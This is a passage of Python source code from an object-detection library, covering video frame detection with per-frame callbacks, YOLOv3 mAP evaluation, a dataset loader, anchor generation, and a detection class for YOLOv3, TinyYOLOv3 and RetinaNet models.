setModelTypeAsTinyYOLOv3(self):\r\n self.__detector.setModelTypeAsTinyYOLOv3()\r\n\r\n def setModelPath(self, model_path: str):\r\n extension_check(model_path)\r\n self.__detector.setModelPath(model_path)\r\n\r\n def setJsonPath(self, configuration_json: str):\r\n self.__detector.setJsonPath(configuration_json)\r\n\r\n def loadModel(self):\r\n self.__detector.loadModel()\r\n\r\n def useCPU(self):\r\n self.__detector.useCPU()\r\n\r\n def detectObjectsFromVideo(self, input_file_path=\"\", camera_input=None, output_file_path=\"\", frames_per_second=20,\r\n frame_detection_interval=1, minimum_percentage_probability=40, log_progress=False,\r\n display_percentage_probability=True, display_object_name=True, display_box=True,\r\n save_detected_video=True,\r\n per_frame_function=None, per_second_function=None, per_minute_function=None,\r\n video_complete_function=None, return_detected_frame=False, detection_timeout=None):\r\n\r\n\r\n if (input_file_path == \"\" and camera_input == None):\r\n raise ValueError(\r\n \"You must set 'input_file_path' to a valid video file, or set 'camera_input' to a valid camera\")\r\n elif (save_detected_video == True and output_file_path == \"\"):\r\n raise ValueError(\r\n \"You must set 'output_video_filepath' to a valid video file name, in which the detected video will be saved. If you don't intend to save the detected video, set 'save_detected_video=False'\")\r\n\r\n else:\r\n\r\n output_frames_dict = {}\r\n output_frames_count_dict = {}\r\n\r\n input_video = cv.VideoCapture(input_file_path)\r\n if (camera_input != None):\r\n input_video = camera_input\r\n\r\n output_video_filepath = output_file_path + '.mp4'\r\n\r\n frame_width = int(input_video.get(3))\r\n frame_height = int(input_video.get(4))\r\n output_video = cv.VideoWriter(output_video_filepath, cv.VideoWriter_fourcc(*\"MP4V\"),\r\n frames_per_second,\r\n (frame_width, frame_height))\r\n\r\n counting = 0\r\n\r\n detection_timeout_count = 0\r\n video_frames_count = 0\r\n\r\n while (input_video.isOpened()):\r\n ret, frame = input_video.read()\r\n\r\n if (ret == True):\r\n\r\n video_frames_count += 1\r\n if (detection_timeout != None):\r\n if ((video_frames_count % frames_per_second) == 0):\r\n detection_timeout_count += 1\r\n\r\n if (detection_timeout_count >= detection_timeout):\r\n break\r\n\r\n output_objects_array = []\r\n\r\n counting += 1\r\n\r\n if (log_progress == True):\r\n print(\"Processing Frame : \", str(counting))\r\n\r\n detected_copy = frame.copy()\r\n\r\n check_frame_interval = counting % frame_detection_interval\r\n\r\n if (counting == 1 or check_frame_interval == 0):\r\n try:\r\n detected_copy, output_objects_array = self.__detector.detectObjectsFromImage(\r\n input_image=frame, output_type=\"array\",\r\n minimum_percentage_probability=minimum_percentage_probability,\r\n display_percentage_probability=display_percentage_probability,\r\n display_object_name=display_object_name,\r\n display_box=display_box)\r\n\r\n except Exception as e:\r\n warnings.warn()\r\n\r\n if (save_detected_video == True):\r\n output_video.write(detected_copy)\r\n\r\n if detected_copy is not None and output_objects_array is not None:\r\n\r\n output_frames_dict[counting] = output_objects_array\r\n\r\n output_objects_count = {}\r\n for eachItem in output_objects_array:\r\n eachItemName = eachItem[\"name\"]\r\n try:\r\n output_objects_count[eachItemName] = output_objects_count[eachItemName] + 1\r\n except:\r\n output_objects_count[eachItemName] = 1\r\n\r\n output_frames_count_dict[counting] = output_objects_count\r\n\r\n if (counting == 1 or check_frame_interval == 0):\r\n if (per_frame_function != None):\r\n if (return_detected_frame == True):\r\n per_frame_function(counting, output_objects_array, output_objects_count,\r\n detected_copy)\r\n elif (return_detected_frame == False):\r\n per_frame_function(counting, output_objects_array, output_objects_count)\r\n\r\n if (per_second_function != None):\r\n if (counting != 1 and (counting % frames_per_second) == 0):\r\n\r\n this_second_output_object_array = []\r\n this_second_counting_array = []\r\n this_second_counting = {}\r\n\r\n for aa in range(counting):\r\n if (aa >= (counting - frames_per_second)):\r\n this_second_output_object_array.append(output_frames_dict[aa + 1])\r\n this_second_counting_array.append(output_frames_count_dict[aa + 1])\r\n\r\n for eachCountingDict in this_second_counting_array:\r\n for eachItem in eachCountingDict:\r\n try:\r\n this_second_counting[eachItem] = this_second_counting[eachItem] + \\\r\n eachCountingDict[eachItem]\r\n except:\r\n this_second_counting[eachItem] = eachCountingDict[eachItem]\r\n\r\n for eachCountingItem in this_second_counting:\r\n this_second_counting[eachCountingItem] = int(\r\n this_second_counting[eachCountingItem] / frames_per_second)\r\n\r\n if (return_detected_frame == True):\r\n per_second_function(int(counting / frames_per_second),\r\n this_second_output_object_array, this_second_counting_array,\r\n this_second_counting, detected_copy)\r\n\r\n elif (return_detected_frame == False):\r\n per_second_function(int(counting / frames_per_second),\r\n this_second_output_object_array, this_second_counting_array,\r\n this_second_counting)\r\n\r\n if (per_minute_function != None):\r\n\r\n if (counting != 1 and (counting % (frames_per_second * 60)) == 0):\r\n\r\n this_minute_output_object_array = []\r\n this_minute_counting_array = []\r\n this_minute_counting = {}\r\n\r\n for aa in range(counting):\r\n if (aa >= (counting - (frames_per_second * 60))):\r\n this_minute_output_object_array.append(output_frames_dict[aa + 1])\r\n this_minute_counting_array.append(output_frames_count_dict[aa + 1])\r\n\r\n for eachCountingDict in this_minute_counting_array:\r\n for eachItem in eachCountingDict:\r\n try:\r\n this_minute_counting[eachItem] = this_minute_counting[eachItem] + \\\r\n eachCountingDict[eachItem]\r\n except:\r\n this_minute_counting[eachItem] = eachCountingDict[eachItem]\r\n\r\n for eachCountingItem in this_minute_counting:\r\n this_minute_counting[eachCountingItem] = int(\r\n this_minute_counting[eachCountingItem] / (frames_per_second * 60))\r\n\r\n if (return_detected_frame == True):\r\n per_minute_function(int(counting / (frames_per_second * 60)),\r\n this_minute_output_object_array, this_minute_counting_array,\r\n this_minute_counting, detected_copy)\r\n\r\n elif (return_detected_frame == False):\r\n per_minute_function(int(counting / (frames_per_second * 60)),\r\n this_minute_output_object_array, this_minute_counting_array,\r\n this_minute_counting)\r\n else:\r\n break\r\n\r\n if (video_complete_function != None):\r\n\r\n this_video_output_object_array = []\r\n this_video_counting_array = []\r\n this_video_counting = {}\r\n\r\n for aa in range(counting):\r\n this_video_output_object_array.append(output_frames_dict[aa + 1])\r\n this_video_counting_array.append(output_frames_count_dict[aa + 1])\r\n\r\n for eachCountingDict in this_video_counting_array:\r\n for eachItem in eachCountingDict:\r\n try:\r\n this_video_counting[eachItem] = this_video_counting[eachItem] + \\\r\n eachCountingDict[eachItem]\r\n except:\r\n this_video_counting[eachItem] = eachCountingDict[eachItem]\r\n\r\n for eachCountingItem in this_video_counting:\r\n this_video_counting[eachCountingItem] = int(this_video_counting[eachCountingItem] / counting)\r\n\r\n video_complete_function(this_video_output_object_array, this_video_counting_array,\r\n this_video_counting)\r\n\r\n input_video.release()\r\n output_video.release()\r\n\r\n if (save_detected_video == True):\r\n return output_video_filepath\r\n\r\n\r\ndef xywh2xyxy(box_coord: torch.Tensor):\r\n n = box_coord.clone()\r\n n[:, 0] = (box_coord[:, 0] - (box_coord[:, 2] / 2))\r\n n[:, 1] = (box_coord[:, 1] - (box_coord[:, 3] / 2))\r\n n[:, 2] = (box_coord[:, 0] + (box_coord[:, 2] / 2))\r\n n[:, 3] = (box_coord[:, 1] + (box_coord[:, 3] / 2))\r\n\r\n return n\r\n\r\n\r\ndef process_batch(detections, labels, iouv):\r\n detections[:, [1, 3]] = torch.clamp(detections[:, [1, 3]], 0.0, 416)\r\n detections[:, [2, 4]] = torch.clamp(detections[:, [2, 4]], 0.0, 416)\r\n\r\n correct = torch.zeros(detections.shape[0], iouv.shape[0], dtype=torch.bool, device=iouv.device)\r\n iou = box_iou(labels[:, 1:], detections[:, 1:5])\r\n x = torch.where((iou >= iouv[0]) & (labels[:, 0:1] == detections[:, 7])) \r\n if x[0].shape[0]:\r\n matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy() \r\n if x[0].shape[0] > 1:\r\n matches = matches[matches[:, 2].argsort()[::-1]]\r\n matches = matches[np.unique(matches[:, 1], return_index=True)[1]]\r\n matches = matches[np.unique(matches[:, 0], return_index=True)[1]]\r\n matches = torch.Tensor(matches).to(iouv.device)\r\n correct[matches[:, 1].long()] = matches[:, 2:3] >= iouv\r\n return correct\r\n\r\n\r\n@torch.no_grad()\r\ndef run(model, val_dataloader, num_class, net_dim=416, nms_thresh=0.6, objectness_thresh=0.001, device=\"cpu\"):\r\n model.eval()\r\n nc = int(num_class) \r\n iouv = torch.linspace(0.5, 0.95, 10).to(device) \r\n niou = iouv.numel()\r\n\r\n p, r, f1, mp, mr, map50, map = 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0\r\n stats, ap, ap_class = [], [], []\r\n\r\n for batch_i, (im, targets) in tqdm(enumerate(val_dataloader)):\r\n im = im.to(device)\r\n targets = targets.to(device)\r\n nb = im.shape[0] \r\n\r\n \r\n out = model(im) \r\n\r\n \r\n targets[:, 2:] *= torch.Tensor([net_dim, net_dim, net_dim, net_dim]).to(device) \r\n out = get_predictions(\r\n pred=out.to(device), num_classes=nc,\r\n objectness_confidence=objectness_thresh,\r\n nms_confidence_level=nms_thresh, device=device\r\n )\r\n\r\n \r\n for si in range(nb):\r\n labels = targets[targets[:, 0] == si, 1:]\r\n pred = out[out[:, 0] == si, :] if isinstance(out, torch.Tensor) else torch.zeros((0, 0), device=device)\r\n nl = len(labels)\r\n tcls = labels[:, 0].tolist() if nl else []\r\n\r\n if len(pred) == 0:\r\n if nl:\r\n stats.append((torch.zeros(0, niou, dtype=torch.bool, device=\"cpu\"), torch.Tensor(device=\"cpu\"),\r\n torch.Tensor(device=\"cpu\"), tcls))\r\n continue\r\n\r\n \r\n if nc == 1:\r\n pred[:, 7] = 0\r\n\r\n if pred.shape[0] > 300:\r\n pred = pred[:300, :]\r\n\r\n predn = pred.clone()\r\n\r\n \r\n if nl:\r\n tbox = xywh2xyxy(labels[:, 1:5]).to(device) \r\n labelsn = torch.cat((labels[:, 0:1], tbox), 1).to(device) \r\n correct = process_batch(predn, labelsn, iouv)\r\n else:\r\n correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)\r\n stats.append((correct.cpu(), pred[:, 5].cpu(), pred[:, 7].cpu(), tcls)) \r\n\r\n\r\n stats = [np.concatenate(x, 0) for x in zip(*stats)] \r\n if len(stats) and stats[0].any():\r\n p, r, ap, f1, ap_class = ap_per_class(*stats)\r\n ap50, ap = ap[:, 0], ap.mean(1)\r\n mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()\r\n\r\n return mp, mr, map50, map\r\ndef ap_per_class(tp, conf, pred_cls, target_cls):\r\n\r\n\r\n i = np.argsort(-conf)\r\n tp, conf, pred_cls = tp[i], conf[i], pred_cls[i]\r\n\r\n\r\n unique_classes = np.unique(target_cls)\r\n nc = unique_classes.shape[0]\r\n\r\n\r\n px = np.linspace(0, 1, 1000)\r\n ap, p, r = np.zeros((nc, tp.shape[1])), np.zeros((nc, 1000)), np.zeros((nc, 1000))\r\n for ci, c in enumerate(unique_classes):\r\n i = pred_cls == c\r\n n_l = (target_cls == c).sum()\r\n n_p = i.sum()\r\n\r\n if n_p == 0 or n_l == 0:\r\n continue\r\n else:\r\n\r\n fpc = (1 - tp[i]).cumsum(0)\r\n tpc = tp[i].cumsum(0)\r\n\r\n\r\n recall = tpc / (n_l + 1e-16) \r\n r[ci] = np.interp(-px, -conf[i], recall[:, 0], left=0)\r\n\r\n precision = tpc / (tpc + fpc) \r\n p[ci] = np.interp(-px, -conf[i], precision[:, 0], left=1)\r\n\r\n\r\n for j in range(tp.shape[1]):\r\n ap[ci, j], mpre, mrec = compute_ap(recall[:, j], precision[:, j])\r\n\r\n\r\n f1 = 2 * p * r / (p + r + 1e-16)\r\n i = f1.mean(0).argmax()\r\n\r\n return p[:, i], r[:, i], ap, f1[:, i], unique_classes.astype('int32')\r\n\r\n\r\ndef compute_ap(recall, precision):\r\n\r\n mrec = np.concatenate(([0.0], recall, [1.0]))\r\n mpre = np.concatenate(([1.0], precision, [0.0]))\r\n\r\n\r\n mpre = np.flip(np.maximum.accumulate(np.flip(mpre)))\r\n\r\n\r\n x = np.linspace(0, 1, 101)\r\n ap = np.trapz(np.interp(x, mrec, mpre), x) \r\n\r\n return ap, mpre, mrec\r\n\r\nclass LoadImagesAndLabels(Dataset):\r\n\r\n def __init__(self, path: str, net_dim=(416, 416), train=True):\r\n if not os.path.isdir(path):\r\n raise NotADirectoryError(\"path is not a valid directory!!!\")\r\n\r\n super().__init__()\r\n\r\n if train:\r\n path = os.path.join(path, \"train\")\r\n else:\r\n path = os.path.join(path, \"validation\")\r\n\r\n self.__net_width, self.__net_height = net_dim\r\n self.__images_paths = []\r\n self.shapes = []\r\n self.labels = []\r\n for img in os.listdir(os.path.join(path, \"images\")):\r\n p = os.path.join(path, \"images\", img)\r\n image = cv.imread(p)\r\n if isinstance(image, np.ndarray):\r\n l_p = self.__img_path2label_path(p)\r\n self.__images_paths.append(p)\r\n self.shapes.append((image.shape[1], image.shape[0]))\r\n self.labels.append(self.__load_raw_label(l_p))\r\n\r\n self.__nsamples = len(self.__images_paths)\r\n self.shapes = np.array(self.shapes)\r\n\r\n def __len__(self) -> int:\r\n return self.__nsamples\r\n\r\n def __img_path2label_path(self, path: str) -> str:\r\n im, lb = os.sep + \"images\" + os.sep, os.sep + \"annotations\" + os.sep\r\n return lb.join(path.rsplit(im, 1)).rsplit(\".\", 1)[0] + \".txt\"\r\n\r\n def __getitem__(self, idx) -> Tuple[torch.Tensor, torch.Tensor]:\r\n if idx >= self.__nsamples:\r\n raise IndexError(\"Index out of range.\")\r\n image_path = self.__images_paths[idx]\r\n label = self.labels[idx].copy()\r\n image, label = self.__load_data(image_path, label)\r\n return image, label\r\n\r\n def __xywhn2xyxy(self, nlabel: torch.Tensor, width: int, height: int) -> torch.Tensor:\r\n label = nlabel.clone()\r\n label[:, 1] = (nlabel[:, 1] - (nlabel[:, 3] / 2)) * width\r\n label[:, 2] = (nlabel[:, 2] - (nlabel[:, 4] / 2)) * height\r\n label[:, 3] = (nlabel[:, 1] + (nlabel[:, 3] / 2)) * width\r\n label[:, 4] = (nlabel[:, 2] + (nlabel[:, 4] / 2)) * height\r\n\r\n return label\r\n\r\n def __load_data(self, img_path: str, label: np.ndarray) -> Tuple[torch.Tensor, torch.Tensor]:\r\n img = cv.imread(img_path)\r\n img_h, img_w = img.shape[:2]\r\n img = prepare_image(img[:, :, :3], [self.__net_width, self.__net_height])\r\n lab = self.__process_label(label, img_w, img_h)\r\n return img.squeeze(), lab\r\n\r\n def __load_raw_label(self, label_path: str):\r\n if os.path.isfile(label_path):\r\n with warnings.catch_warnings():\r\n l = np.loadtxt(label_path).reshape(-1, 5)\r\n assert (l >= 0).all(), \"bounding box values should be positive and in range 0 - 1\"\r\n assert (l[:, 1:] <= 1).all(), \"bounding box values should be in the range 0 - 1\"\r\n else:\r\n l = np.zeros((0, 5), dtype=np.float32)\r\n return l\r\n\r\n def __process_label(self, label: np.ndarray, image_width: int, image_height: int) -> torch.Tensor:\r\n\r\n scaling_factor = min(\r\n self.__net_width / image_width,\r\n self.__net_width / image_height\r\n )\r\n\r\n bs = torch.zeros((len(label), 6))\r\n if label.size > 0:\r\n nlabels = torch.from_numpy(label)\r\n labels = self.__xywhn2xyxy(nlabels, image_width, image_height)\r\n\r\n labels[:, [1, 3]] = ((labels[:, [1, 3]] * scaling_factor) + \\\r\n (self.__net_width - (image_width * scaling_factor)) / 2)\r\n labels[:, [2, 4]] = ((labels[:, [2, 4]] * scaling_factor) + \\\r\n (self.__net_width - (image_height * scaling_factor)) / 2)\r\n\r\n\r\n label_copy = labels.clone()\r\n labels[:, 1] = (label_copy[:, 3] + label_copy[:, 1]) / 2\r\n labels[:, 2] = (label_copy[:, 4] + label_copy[:, 2]) / 2\r\n labels[:, 3] = (label_copy[:, 3] - label_copy[:, 1])\r\n labels[:, 4] = (label_copy[:, 4] - label_copy[:, 2])\r\n\r\n\r\n labels[:, 1:5] /= self.__net_width\r\n bs[:, 1:] = labels[:, :]\r\n return bs\r\n\r\n def collate_fn(self, batch) -> Tuple[torch.Tensor, torch.Tensor]:\r\n batch = [data for data in batch if data is not None]\r\n imgs, bboxes = list(zip(*batch))\r\n\r\n imgs = torch.stack(imgs)\r\n\r\n for i, boxes in enumerate(bboxes):\r\n boxes[:, 0] = i\r\n bboxes = torch.cat(bboxes, 0)\r\n\r\n return imgs, bboxes\r\ndef generate_anchors(dataset, n=9, img_size=416, thr=4.0, gen=1000, verbose=True):\r\n thr = 1 / thr\r\n\r\n def metric(k, wh):\r\n r = wh[:, None] / k[None]\r\n x = torch.min(r, 1 / r).min(2)[0]\r\n return x, x.max(1)[0] \r\n\r\n def anchor_fitness(k):\r\n _, best = metric(torch.tensor(k, dtype=torch.float32), wh)\r\n return (best * (best > thr).float()).mean()\r\n\r\n def print_results(k, verbose=True):\r\n k = k[np.argsort(k.prod(1))]\r\n if verbose:\r\n x, best = metric(k, wh0)\r\n bpr, aat = (best > thr).float().mean(), (x > thr).float().mean() * n \r\n s = f'thr={thr:.2f}: {bpr:.4f} best possible recall, {aat:.2f} anchors past thr\\n' \\\r\n f'n={n}, img_size={img_size}, metric_all={x.mean():.3f}/{best.mean():.3f}-mean/best, ' \\\r\n f'past_thr={x[x > thr].mean():.3f}-mean: '\r\n print(s)\r\n return k\r\n shapes = img_size * dataset.shapes / dataset.shapes.max(1, keepdims=True)\r\n wh0 = np.concatenate([l[:, 3:5] * s for s, l in zip(shapes, dataset.labels)]) \r\n\r\n \r\n i = (wh0 < 3.0).any(1).sum()\r\n if i and verbose:\r\n print(f'WARNING: Extremely small objects found. {i} of {len(wh0)} labels are < 3 pixels in size.')\r\n wh = wh0[(wh0 >= 2.0).any(1)] \r\n\r\n s = wh.std(0) \r\n k, dist = kmeans(wh / s, n, iter=30) \r\n assert len(k) == n, f'ERROR: scipy.cluster.vq.kmeans requested {n} points but returned only {len(k)}'\r\n k *= s\r\n wh = torch.tensor(wh, dtype=torch.float32) \r\n wh0 = torch.tensor(wh0, dtype=torch.float32) \r\n k = print_results(k, verbose=False)\r\n\r\n \r\n npr = np.random\r\n f, sh, mp, s = anchor_fitness(k), k.shape, 0.9, 0.1 \r\n if verbose:\r\n print(\"Generating anchor boxes for training images...\")\r\n for _ in range(gen):\r\n v = np.ones(sh)\r\n while (v == 1).all(): \r\n v = ((npr.random(sh) < mp) * random.random() * npr.randn(*sh) * s + 1).clip(0.3, 3.0)\r\n kg = (k.copy() * v).clip(min=2.0)\r\n fg = anchor_fitness(kg)\r\n if fg > f:\r\n f, k = fg, kg.copy()\r\n\r\n return print_results(k)\r\n\r\nclass ImageReadMode(Enum):\r\n\r\n UNCHANGED = 0\r\n GRAY = 1\r\n GRAY_ALPHA = 2\r\n RGB = 3\r\n RGB_ALPHA = 4\r\n\r\n\r\nclass ObjectDetection:\r\n\r\n\r\n def __init__(self) -> None:\r\n self.__device: str = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__nms_score: float = 0.4\r\n self.__objectness_score: float = 0.5\r\n self.__anchors: List[int] = None\r\n self.__anchors_yolov3: List[int] = [10, 13, 16, 30, 33, 23, 30, 61, 62, 45, 59, 119, 116, 90, 156, 198, 373,\r\n 326]\r\n self.__anchors_tiny_yolov3: List[int] = [10, 14, 23, 27, 37, 58, 81, 82, 135, 169, 344, 319]\r\n\r\n self.__classes = self.__load_classes(\r\n os.path.join(os.path.dirname(os.path.abspath(__file__)), \"coco_classes.txt\"))\r\n self.__model_type = \"\"\r\n self.__model = None\r\n self.__model_loaded = False\r\n self.__model_path = \"\"\r\n\r\n def __load_classes(self, path: str) -> List[str]:\r\n with open(path) as f:\r\n unique_classes = [c.strip() for c in f.readlines()]\r\n return unique_classes\r\n\r\n def __load_image_yolo(self, input_image: Union[str, np.ndarray, Image.Image]) -> Tuple[\r\n List[str], List[np.ndarray], torch.Tensor, torch.Tensor]:\r\n allowed_exts = [\"jpg\", \"jpeg\", \"png\"]\r\n fnames = []\r\n original_dims = []\r\n inputs = []\r\n original_imgs = []\r\n if type(input_image) == str:\r\n if os.path.isfile(input_image):\r\n if input_image.rsplit('.')[-1].lower() in allowed_exts:\r\n img = cv.imread(input_image)\r\n else:\r\n raise ValueError(f\"image path '{input_image}' is not found or a valid file\")\r\n elif type(input_image) == np.ndarray:\r\n img = input_image\r\n elif \"PIL\" in str(type(input_image)):\r\n img = np.asarray(input_image)\r\n else:\r\n raise ValueError(f\"Invalid image input format\")\r\n\r\n img_h, img_w, _ = img.shape\r\n\r\n original_imgs.append(np.array(cv.cvtColor(img, cv.COLOR_BGR2RGB)).astype(np.uint8))\r\n original_dims.append((img_w, img_h))\r\n if type(input_image) == str:\r\n fnames.append(os.path.basename(input_image))\r\n else:\r\n fnames.append(\"\")\r\n inputs.append(prepare_image(img, (416, 416)))\r\n\r\n if original_dims:\r\n return (\r\n fnames,\r\n original_imgs,\r\n torch.FloatTensor(original_dims).repeat(1, 2).to(self.__device),\r\n torch.cat(inputs, 0).to(self.__device)\r\n )\r\n raise RuntimeError(\r\n f\"Error loading image.\"\r\n \"\\nEnsure the file is a valid image,\"\r\n \" allowed file extensions are .jpg, .jpeg, .png\"\r\n )\r\n\r\n def __save_temp_img(self, input_image: Union[np.ndarray, Image.Image]) -> str:\r\n\r\n temp_path = os.path.join(\r\n os.path.dirname(os.path.abspath(__file__)),\r\n f\"{str(uuid.uuid4())}.jpg\"\r\n )\r\n if type(input_image) == np.ndarray:\r\n cv.imwrite(temp_path, input_image)\r\n elif \"PIL\" in str(type(input_image)):\r\n input_image.save(temp_path)\r\n else:\r\n raise ValueError(\r\n f\"Invalid image input. Supported formats are OpenCV/Numpy array, PIL image or image file path\"\r\n )\r\n\r\n return temp_path\r\n\r\n def __load_image_retinanet(self, input_image: str) -> Tuple[List[str], List[torch.Tensor], List[torch.Tensor]]:\r\n\r\n allowed_file_extensions = [\"jpg\", \"jpeg\", \"png\"]\r\n images = []\r\n scaled_images = []\r\n fnames = []\r\n\r\n delete_file = False\r\n if type(input_image) is not str:\r\n input_image = self.__save_temp_img(input_image=input_image)\r\n delete_file = True\r\n\r\n if os.path.isfile(input_image):\r\n if input_image.rsplit('.')[-1].lower() in allowed_file_extensions:\r\n img = read_image(input_image, ImageReadMode.RGB)\r\n images.append(img)\r\n scaled_images.append(img.div(255.0).to(self.__device))\r\n fnames.append(os.path.basename(input_image))\r\n else:\r\n raise ValueError(f\"Input image with path {input_image} not a valid file\")\r\n\r\n if delete_file:\r\n os.remove(input_image)\r\n\r\n if images:\r\n return (fnames, images, scaled_images)\r\n raise RuntimeError(\r\n f\"Error loading image from input.\"\r\n \"\\nEnsure the folder contains images,\"\r\n \" allowed file extensions are .jpg, .jpeg, .png\"\r\n )\r\n\r\n def setModelTypeAsYOLOv3(self):\r\n\r\n self.__anchors = self.__anchors_yolov3\r\n self.__model_type = \"yolov3\"\r\n\r\n def setModelTypeAsTinyYOLOv3(self):\r\n\r\n self.__anchors = self.__anchors_tiny_yolov3\r\n self.__model_type = \"tiny-yolov3\"\r\n\r\n def setModelTypeAsRetinaNet(self):\r\n\r\n self.__anchors = self.__anchors_tiny_yolov3\r\n self.__model_type = \"retinanet\"\r\n\r\n def setModelPath(self, path: str) -> None:\r\n\r\n if os.path.isfile(path):\r\n extension_check(path)\r\n self.__model_path = path\r\n self.__model_loaded = False\r\n else:\r\n raise ValueError(\r\n \"invalid path, path not pointing to a valid file.\"\r\n ) from None\r\n\r\n def useCPU(self):\r\n\r\n self.__device = \"cpu\"\r\n if self.__model_loaded:\r\n self.__model_loaded = False\r\n self.loadModel()\r\n\r\n def loadModel(self) -> None:\r\n\r\n if not self.__model_loaded:\r\n if self.__model_type == \"yolov3\":\r\n self.__model = YoloV3(\r\n anchors=self.__anchors,\r\n num_classes=len(self.__classes), \\\r\n device=self.__device\r\n )\r\n elif self.__model_type == \"tiny-yolov3\":\r\n self.__model = YoloV3Tiny(\r\n anchors=self.__anchors,\r\n num_classes=len(self.__classes),\r\n device=self.__device\r\n )\r\n elif self.__model_type == \"retinanet\":\r\n\r\n self.__classes = self.__load_classes(\r\n os.path.join(os.path.dirname(os.path.abspath(__file__)), \"coco91_classes.txt\"))\r\n\r\n self.__model = torchvision.models.detection.retinanet_resnet50_fpn(\r\n pretrained=False, num_classes=91,\r\n pretrained_backbone=False\r\n )\r\n else:\r\n raise ValueError(\r\n f\"Invalid model type. Call setModelTypeAsYOLOv3(), setModelTypeAsTinyYOLOv3() or setModelTypeAsRetinaNet to set a model type before loading the model\")\r\n\r\n state_dict = torch.load(self.__model_path, map_location=self.__device)\r\n try:\r\n self.__model.load_state_dict(state_dict)\r\n self.__model_loaded = True\r\n self.__model.to(self.__device).eval()\r\n except:\r\n raise RuntimeError(\"Invalid weights!!!\") from None\r\n\r\n def CustomObjects(self, **kwargs):\r\n\r\n\r\n if not self.__model_loaded:\r\n self.loadModel()\r\n all_objects_str = (obj_label.replace(\" \", \"_\") for obj_label in self.__classes)\r\n all_objects_dict = {}\r\n for object_str in all_objects_str:\r\n all_objects_dict[object_str] = False\r\n\r\n for karg in kwargs:\r\n if karg in all_objects_dict:\r\n all_objects_dict[karg] = kwargs[karg]\r\n else:\r\n raise ValueError(f\" object '{karg}' doesn't exist in the supported object classes\")\r\n\r\n return all_objects_dict\r\n\r\n def detectObjectsFromImage(self,\r\n input_image: Union[str, np.ndarray, Image.Image],\r\n output_image_path: str = None,\r\n output_type: str = \"file\",\r\n extract_detected_objects: bool = False, minimum_percentage_probability: int = 50,\r\n display_percentage_probability: bool = True, display_object_name: bool = True,\r\n display_box: bool = True,\r\n custom_objects: List = None\r\n ) -> Union[\r\n List[List[Tuple[str, float, Dict[str, int]]]], np.ndarray, List[np.ndarray], List[str]]:\r\n\r\n self.__model.eval()\r\n if not self.__model_loaded:\r\n if self.__model_path:\r\n warnings.warn(\r\n \"Model path has changed but pretrained weights in the\"\r\n \" new path is yet to be loaded.\",\r\n ResourceWarning\r\n )\r\n else:\r\n raise RuntimeError(\r\n \"Model path isn't set, pretrained weights aren't used.\"\r\n )\r\n predictions = defaultdict(lambda: [])\r\n\r\n if self.__model_type == \"yolov3\" or self.__model_type == \"tiny-yolov3\":\r\n fnames, original_imgs, input_dims, imgs = self.__load_image_yolo(input_image)\r\n\r\n with torch.no_grad():\r\n output = self.__model(imgs)\r\n\r\n output = get_predictions(\r\n pred=output.to(self.__device), num_classes=len(self.__classes),\r\n nms_confidence_level=self.__nms_score, objectness_confidence=self.__objectness_score,\r\n device=self.__device\r\n )\r\n\r\n if output is None:\r\n if output_type == \"array\":\r\n if extract_detected_objects:\r\n return original_imgs[0], [], []\r\n else:\r\n return original_imgs[0], []\r\n else:\r\n if extract_detected_objects:\r\n return original_imgs[0], []\r\n else:\r\n return []\r\n\r\n \r\n input_dims = torch.index_select(input_dims, 0, output[:, 0].long())\r\n scaling_factor = torch.min(416 / input_dims, 1)[0].view(-1, 1)\r\n output[:, [1, 3]] -= (416 - (scaling_factor * input_dims[:, 0].view(-1, 1))) / 2\r\n output[:, [2, 4]] -= (416 - (scaling_factor * input_dims[:, 1].view(-1, 1))) / 2\r\n output[:, 1:5] /= scaling_factor\r\n\r\n \r\n for idx in range(output.shape[0]):\r\n output[idx, [1, 3]] = torch.clamp(output[idx, [1, 3]], 0.0, input_dims[idx, 0])\r\n output[idx, [2, 4]] = torch.clamp(output[idx, [2, 4]], 0.0, input_dims[idx, 1])\r\n\r\n for pred in output:\r\n pred_label = self.__classes[int(pred[-1])]\r\n if custom_objects:\r\n if pred_label.replace(\" \", \"_\") in custom_objects.keys():\r\n if not custom_objects[pred_label.replace(\" \", \"_\")]:\r\n continue\r\n else:\r\n continue\r\n predictions[int(pred[0])].append((\r\n pred_label,\r\n float(pred[-2]),\r\n {k: v for k, v in zip([\"x1\", \"y1\", \"x2\", \"y2\"], map(int, pred[1:5]))},\r\n ))\r\n elif self.__model_type == \"retinanet\":\r\n fnames, original_imgs, scaled_images = self.__load_image_retinanet(input_image)\r\n with torch.no_grad():\r\n output = self.__model(scaled_images)\r\n\r\n if output is None:\r\n if output_type == \"array\":\r\n if extract_detected_objects:\r\n return original_imgs[0], [], []\r\n else:\r\n return original_imgs[0], []\r\n else:\r\n if extract_detected_objects:\r\n return original_imgs[0], []\r\n else:\r\n return []\r\n\r\n for idx, pred in enumerate(output):\r\n for id in range(pred[\"labels\"].shape[0]):\r\n if pred[\"scores\"][id] >= self.__objectness_score:\r\n pred_label = self.__classes[pred[\"labels\"][id]]\r\n\r\n if custom_objects:\r\n if pred_label.replace(\" \", \"_\") in custom_objects.keys():\r\n if not custom_objects[pred_label.replace(\" \", \"_\")]:\r\n continue\r\n else:\r\n continue\r\n\r\n predictions[idx].append(\r\n (\r\n pred_label,\r\n pred[\"scores\"][id].item(),\r\n {k: v for k, v in zip([\"x1\", \"y1\", \"x2\", \"y2\"], map(int, pred[\"boxes\"][id]))}\r\n )\r\n )\r\n\r\n \r\n original_input_image = None\r\n output_image_array = None\r\n extracted_objects = []\r\n\r\n if self.__model_type == \"yolov3\" or self.__model_type == \"tiny-yolov3\":\r\n original_input_image = cv.cvtColor(original_imgs[0], cv.COLOR_RGB2BGR)\r\n if isinstance(output, torch.Tensor):\r\n for pred in output:\r\n percentage_conf = round(float(pred[-2]) * 100, 2)\r\n if percentage_conf < minimum_percentage_probability:\r\n continue\r\n\r\n displayed_label = \"\"\r\n if display_object_name:\r\n displayed_label = f\"{self.__classes[int(pred[-1].item())]} : \"\r\n if display_percentage_probability:\r\n displayed_label += f\" {percentage_conf}%\"\r\n\r\n original_imgs[int(pred[0].item())] = draw_bbox_and_label(pred[1:5].int() if display_box else None,\r\n displayed_label,\r\n original_imgs[int(pred[0].item())]\r\n )\r\n\r\n output_image_array = cv.cvtColor(original_imgs[0], 